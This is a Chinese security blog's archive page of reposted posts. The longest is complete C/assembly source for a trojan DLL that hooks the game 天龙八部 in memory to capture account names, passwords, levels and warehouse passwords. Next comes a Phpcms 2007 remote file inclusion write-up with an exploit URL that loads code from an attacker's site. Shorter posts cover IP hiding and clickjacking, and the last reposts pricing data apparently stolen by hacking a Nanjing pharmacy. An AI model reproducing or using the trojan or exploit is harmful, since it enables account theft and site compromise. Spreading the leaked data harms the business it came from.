分类 "网络安全" 的存档.

天龙八部木马核心源代码

信息来源:邪恶八进制信息安全团队
文章作者:认真的雪

发一个网游木马核心代码…无聊的时候写的..
截取了用户名,密码,等级,仓库密码

复制内容到剪贴板程序代码程序代码
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

DWORD ui_cegui;

void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;

char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;

DWORD stroePath=0;
void _stdcall StroeUnhook();

void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);

for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}

return 0;

}

DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}
return 0;

}

void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);

return;

}

__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}

void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;

}

__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}

void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}

void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);

}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}

void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}
void HookGrade()
{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);

}

void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();

return 0;
}

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{

switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
DWORD ThreadId;
CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
break;
}

default:break;
}

return TRUE;
}

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/518

Phpcms 2007 远程文件包含漏洞

该cms的核心配置文件/include/common.inc.php有缺陷
——————————————–
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
————————————————
这里extract函数会导致变量覆盖,可能引发一系列的问题

我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码
————————————————
//从头开始看
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
————————————————

利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交
http://target.com/yp/admin.php? Rootdir=http://site.com/即可。

最 后多说一句,php5默认不开启远程文件功能,如果想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的 方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/519

如何防范自己的IP被攻击

  如何防范自己的IP被攻击,来源:赛迪网技术社区
  在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。

  获取IP

  “IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的网络数据包。这是用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后的数据包的IP包头信息,再根据这些信息了解具体的IP。

  隐藏IP

  虽然侦察IP的方法多样,但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言,就可以安装能够自动去掉发送数据包包头IP信息的一些软件。不过使用这些软件有些缺点,譬如:它耗费资源严重,降低计算机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet,特别是QQ使用“ezProxy”等代理软件连接后,IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器,只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口,即可对http使用代理,比较适合由于IE和QQ泄漏IP的情况。

  不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。

  虽然代理可以有效地隐藏用户IP,但高深的黑客亦可以绕过代理,查找到对方的真实IP地址,用户在何种情况下使用何种方法隐藏IP,也要因情况而论。

  另外防火墙也可以在某种程度上使用IP的隐藏,如ZoneAlarm防火墙就有一个隐藏在网上的IP的功能。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/531

点击劫持(Clickjacking)漏洞技术内幕

来源:IT专家网

  Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙:

  当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用lynx一类的字符浏览器。

  这个漏洞与JavaScript无关,即使你关闭浏览器的JavaScript功能也无能为力。事实上这是浏览器工作原理中的一个缺陷。一个恶意网站能让你在毫不知情的情况下点击任意链接,任意按钮或网站上的任意东西。

  该漏洞用到DHTML,使用防frame代码可以保护你不受跨站点攻击,但攻击者仍可以强迫你点击任何链接。你所做的任何点击都被引导到恶意链接上,所以,那些Flash游戏将首当其冲。

  最近国外的安全研究人员已经放出了该漏洞的攻击例子,以及部分细节,这种攻击是利用的CSS样式表的网页渲染功能配合IFRAME帧框架页进行的一种钓鱼网页攻击。这个攻击涉及网页设计相关的技巧,步骤是:

  1.在第三方站点的网页先用IFRAME引入一个需要攻击的页面,将这个引入的框架页长宽设置成整个浏览窗口的大小。

  2.在网页中使用一个CSS滤镜,将整个网页用白色滤镜遮蔽。

  3.使用span或div设计一个层伪造一个表单提交按钮、输入框或者链接,然后利用CSS样式表设置层在网页中的位置,遮蔽住需要劫持的网页按钮、输入框或者链接。

  攻击者使用这种方法可以制作钓鱼网页,诱导用户在不察觉的情况下,完成一些受攻击WEB程序的敏感操作。

漏洞危害:

  攻击者可以制作一个精美的钓鱼网页,让用户在不知不觉中被控制摄像头,或完成密码修改、网银转帐等的恶意操作,给用户造成巨大的损失。

利用录像:http://www.youtube.com/v/gxyLbpldmuU&hl=zh_CN&fs=1

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/534

黑客黑了南京金陵大药房的主机,获得药店进价-网络有多远,你就传多远

品名    单位    规格    厂牌    进价    零售价    毛利    毛利率
晕车贴    盒    2贴    海南宝元堂保健品    0.9    10    9.1    1011.11%
氧氟沙星滴眼液    支    15mg5ml    南京恒生制药    0.82    9.1    8.28    1009.76%
红药水    瓶    2%*20ml    江门恒健药业    0.26    2.8    2.54    976.92%
复方穿心莲片    盒    24片    广西天天乐药业有限公司    1.2    11.2    10    833.33%
盐酸环丙沙星片    盒    0.25g*12片    江西汇仁药业    1    9    8    800.00%
氧氟沙星滴眼液    支    5ml:15mg    金陵药业股份有限公司合肥利民制药厂    1.02    9.1    8.08    792.16%
益母草冲剂    盒    15克*10袋    广西天天乐药业有限公司    1.6    13.8    12.2    762.50%
复方丹参片    瓶    60片    四川蜀中制药    0.58    5    4.42    762.07%
盐酸环丙沙星滴眼液    支    5ml:15mg    南京立业制药    0.93    8    7.07    760.22%
VC银翘片    盒    24片    广西天天乐药业有限公司    1    8.6    7.6    760.00%
灯盏花素片    盒    20mg*24片    湖南康普    2.37    20    17.63    743.88%
龙血竭胶囊    盒    0.3g*24粒    云南云河    3.35    27.8    24.45    729.85%
诺氟沙星眼水    支    8ml    南京立业制药    0.4    3.3    2.9    725.00%
血塞通胶囊    盒    50mg*10's*2板    云南省玉溪市维和制药    4.7    36    31.3    665.96%
罗红霉素胶囊    盒    0.15g*10粒    江苏黄河药业股份有限公司    2.6    19.8    17.2    661.54%
青霉素V钾片    盒    0.25g*12粒    湖南迪诺    1.03    7.7    6.67    647.57%
阿司匹林肠溶片    合    25mg*100`s    南京恒生制药    0.85    6.2    5.35    629.41%
法莫替丁片    盒    20mg*12片*2板    江西汇仁药业    1.1    7.8    6.7    609.09%
奥洛依    盒    0.1g*6粒    江苏黄河药业股份有限公司    1.95    13.6    11.65    597.44%
甲硝唑芬布芬胶囊    盒    12粒    江苏黄河药业股份有限公司    1.15    8    6.85    595.65%
阿奇霉素分散片    盒    0.25g*6片    江苏鹏鹞药业有限公司    4    27.3    23.3    582.50%
天力达    盒    0.1g*6粒    上海天赐福药业    1.94    13    11.06    570.10%
快速秀早早孕检测试条    片    1条    润和生物医药科技(汕头)    0.45    3    2.55    566.67%
新亚康王    支    7g    上海新亚药业    1.24    8.2    6.96    561.29%

更多内容请看附件:
下载文件 点击下载此文件

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/557